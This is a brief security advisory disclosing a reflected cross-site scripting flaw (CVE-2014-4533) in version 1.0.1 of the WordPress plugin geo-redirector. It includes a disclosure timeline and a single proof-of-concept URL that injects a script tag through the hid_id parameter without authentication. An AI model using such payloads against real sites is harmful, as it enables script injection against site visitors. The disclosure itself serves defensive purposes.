wp-plugin : geo-redirector

Plugin Details
Plugin Name: wp-plugin : geo-redirector
Effected Version : 1.0.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/georedirector/ajax_functions.php?hid_id=hid_id%27%3E%3Cscript%3Ealert%282%29%3C/script%3E


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4533
Plugin Description :
[ This is a WordPress plugin , this plugin will allow you to redirect your URLs according to the visitors geographical location. And you can manage redirect the visitor given radios inside or outside.This plugin was developed by AnushkaKR. ]